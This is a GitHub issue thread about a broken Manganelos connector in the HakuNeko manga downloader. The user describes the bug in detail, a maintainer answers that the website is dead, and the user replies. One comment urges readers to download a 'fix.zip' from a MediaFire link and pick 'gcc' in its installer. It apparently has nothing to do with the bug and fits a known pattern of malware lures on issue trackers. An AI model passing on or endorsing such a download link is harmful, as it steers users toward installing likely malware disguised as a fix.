### ISSUE TITLE
[<Manganelos (by AnyACG>] Connector not working/Broken

### ISSUE THREAD

**Issue by GeneralUser-NonDev** [manga-download/hakuneko#7360]
### Is there an existing issue for this connector?

- [X] I have searched the existing issues

### Did you read the troubleshooting guide ?

- [X] I read it but nothing seems related

### Is the website of the connector working properly ?

- [X] Yes i'm able to see the manga within my standard browser

### Make sure to try Nightly Build

- [X] Yes nightly build didn't fix the issue

### What kind of issue are you encountering

Manga list isn't refreshing

### Describe the bug

I searched "Dosanko" in the connector list and got 2 results "KaliScan" and "Manganelos (by AnyACG)" (Mangadex has the title too but doesn't show on the connector search, I was able to add it by url though, however they don't have all the chapters), both load saying there's x number of mangas listed but when I refine/search down to "Dosanko" I get just the relavent Mangas showing 1 or 2 of some twenty or fourty thousand titles, when I click on them the manga chapter page stays at 0/0. When I click on the "open in browser" button in the connectors page Manganelos does nothing (Blank white box). when I copy the url (edit>copy url) and paste it into my Firefox it redirects to some other site COMPLETELY unrelated.
.
System, Windows 10Pro x64, Nigtly build

![Annotation 2024-08-25 193057](https://github.com/user-attachments/assets/64f965a1-3640-442e-aa62-49b2118d13c3)
![Annotation 2024-08-25 193150](https://github.com/user-attachments/assets/a9af963e-0a9c-49c7-b2e5-5f323653cd1f)
![Annotation 2024-08-25 193206](https://github.com/user-attachments/assets/d5a02f61-72d6-4db7-8d1e-7c804abb9b22)
![Annotation 2024-08-25 Build](https://github.com/user-attachments/assets/bbdd4b67-94c2-4776-b2fe-c3a7649e760d)

### To Reproduce

See "Describe the bug" section

1. Name of connector
2. Name of manga (if connector update is working)
3. Name of chapter (if manga update is working)
4. Copy any relevant error message that appears in a popup or (advanced) within the console (press F12)

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by MikeZeDev** [comment]
You expect Hakuneko to work with a DEAD website? Bruh.....

**Comment by GeneralUser-NonDev** [comment]
Sorry, It came up as a result in the search and I didn't know if it was changed to another URL (someone else may have known about) and my instance for some reason hadn't picked up that change, if it was updated, I figured for as long as the connector hasn't been working if it was dead it would have been either removed by now from the search query or it was just a broken link that needed to be repaired that someone may have known about.
